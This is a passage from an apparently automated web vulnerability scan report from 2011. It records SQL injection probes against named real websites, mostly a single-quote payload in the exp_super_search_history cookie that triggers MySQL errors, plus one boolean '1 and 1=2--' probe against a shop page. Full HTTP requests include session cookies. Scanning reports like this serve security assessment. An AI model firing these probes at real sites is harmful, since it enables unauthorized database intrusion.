       </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Pinedale, WY</span></span>
       <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span>
       <div class="recommended_product">    <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Sp
...[SNIP]...

Request 2

GET /shop.php?1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wiseshop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=a211571b9df89ace6097499eec2d130de55f084c-954372b780745a3c3e66ad3e1a8a46e46c5b08f3; PHPSESSID=i2htret7k8ivj3snodk9ebjrp2; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl;

Response 2

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.wiseshop.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 May 2011 15:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 02 May 2011 15:05:49 GMT
Content-Length: 24237
Connection: close
Set-Cookie: uvx=1-BUFDuhtpQPfhYM2mO-evYdWhAi5GyM91rg4ih_0qgvmXm6SXtJs-EB2XqLP1y0nhEKCCYDljwENG6RVEX5UEYhxlQO-o-kf_in1Ri2_CHOcsANvX5k81IbozK9Mo3KUOiuNBYlORwnG256VeqNwtKSMBYXqgLeYEENLOWsxn5Eble1QxvJLAxLQMl0S4Gxj_5PzsZhDVmcS_-m-KnKrL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVTJkl49MSOoMPGG9ots9Ha9brHBwN_RfMO_kmZGeb20z9y_IXe-ZR1Tf5It-hsDm57IMKie8yahl; expires=Sun, 02-May-2021 05:00:00 GMT; path=/
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="4777db28467cd55a311f
...[SNIP]...
<span class="post">from Hastings, NE</span></span>
       <span class="child_body">After having several Linksys routers go bad after a month or two of usage, I discovered this Netgear router. I've had it over a year, and I haven't had a problem yet. </span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Nicole</span><span class="post">from Logan, UT</span></span>
       <span class="child_body">Netgear offers the best wireless routers out there, and they're extremely reliable. Prices vary greatly depending on which kind would satisfy your needs so chose carefully.</span>
       </div></li><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Jennifer</span><span class="post">from Davenport, IA</span></span>
       <span class="child_body">The Linksys WRT54G router is a good, low cost router for home use.</span>
       </div></li></ul></li><li><div class="node_title"></div><div class="node_head"></div><div class="node_body">Are there any companies that specialize in acoustic research? I am trying to build a home theater room and need help getting the acoustic properties of the room correct.</div><a rel="facebox" href="/solo?module=facebook/login&message_num=4" class="more_link">Reply</a><div class='author_name'><span><span class="question">Question</span></span>Shelby H.<span class='post'>from Dover, DE</span></div><ul class="node_children"><li><div class="node_child">        <span class="child_added_by"><span class='pre'>by </span><span class='name'>Kira</span><span class="post">from Newport, RI</span></span>
       <span class="child_body">I use these -- with a name like "acoustic research" I figure that they already did the work for me!</span>
       <div class="recommended_product">    <img src='http://img.bizrate.com/resize?sq=80&uid=1848571785'/></div><div class='recommendation'><div class='author'>Kira's recommendation:</div><div class='title'>Acoustic Research AW880 Portable Wireless Indoor Stereo Speake
...[SNIP]...

1.35. http://www2.idexpertscorp.com/blog [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1304375596; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; PHPSESSID=jfnbk4r5pvilc331tug96gdad0; __unam=440469-12fb26a1110-5868adc8-3; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.3.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.3.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:41:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376082; expires=Tue, 01-May-2012 15:41:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:41:22 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.36. http://www2.idexpertscorp.com/blog/ [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); exp_last_activity=1304375596; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; PHPSESSID=jfnbk4r5pvilc331tug96gdad0; __unam=440469-12fb26a1110-5868adc8-3; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.3.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.3.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:41:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376119; expires=Tue, 01-May-2012 15:41:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:41:59 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.37. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/ [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/single/are-we-getting-any-smarter/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/single/are-we-getting-any-smarter/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376082; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-7; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.7.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.7.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:52:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376745; expires=Tue, 01-May-2012 15:52:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:52:25 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.38. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/tags/tag/breach+notification

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/tags/tag/breach+notification HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376560; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-8; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.8.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.8.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:51:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376709; expires=Tue, 01-May-2012 15:51:49 GMT; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:51:49 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.39. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/ [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /blog/tags/tag/breach+notification/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /blog/tags/tag/breach+notification/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376560; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-8; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.8.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.8.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:52:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376738; expires=Tue, 01-May-2012 15:52:18 GMT; path=/
Cache-Control: public
Expires: Sat, 07 May 2011 15:52:18 GMT
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.40. http://www2.idexpertscorp.com/breach-tools [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; exp_last_activity=1304376583; __unam=440469-12fb26a1110-5868adc8-9; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.9.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.9.10.1304368386

Response (redirected)

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376803; expires=Tue, 01-May-2012 15:53:23 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbreach-tools%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.41. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/ [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools/breach-healthcheck/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools/breach-healthcheck/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; exp_last_activity=1304376583; __unam=440469-12fb26a1110-5868adc8-9; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.9.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.9.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:54:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376872; expires=Tue, 01-May-2012 15:54:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.42. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/ [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /breach-tools/radar-for-phi-1/

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /breach-tools/radar-for-phi-1/ HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
Referer: http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ubvt=173.193.214.243.1304349963666894; exp_last_visit=989015581; exp_super_search_history=797022'; __switchTo5x=58; __utmz=1.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=8236212.1304368386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=jfnbk4r5pvilc331tug96gdad0; exp_last_activity=1304376589; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A3%3Bs%3A9%3A%22%2Fcontact%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __unam=440469-12fb26a1110-5868adc8-10; __utma=1.843288026.1304368386.1304368386.1304368386.1; __utmc=1; __utmb=1.10.10.1304368386; __utma=8236212.1025446137.1304368386.1304368386.1304368386.1; __utmc=8236212; __utmb=8236212.10.10.1304368386

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 02 May 2011 15:54:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1304376880; expires=Tue, 01-May-2012 15:54:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fbreach-tools%2Fradar-for-phi-1%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fbreach-tools%2Fbreach-healthcheck%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fblog%2Fsingle%2Fare-we-getting-any-smarter%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A4%3Bs%3A9%3A%22%2Fcontact%2F%22%3B%7D; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
imagetoolbar: no
Content-Length: 1026
Connection: close
Content-Type: text/html

<html>
<head>
<title>Database Error</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                #000
...[SNIP]...
<p>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND saved = 'n' ORDER BY search_date DESC LIMIT 1' at line 3</p>
...[SNIP]...

1.43. http://www2.idexpertscorp.com/contact [exp_super_search_history cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.idexpertscorp.com
Path:   /contact

Issue detail

The exp_super_search_history cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the exp_super_search_history cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /contact HTTP/1.1
Host: www2.idexpertscorp.com
Proxy-Connection: keep-alive
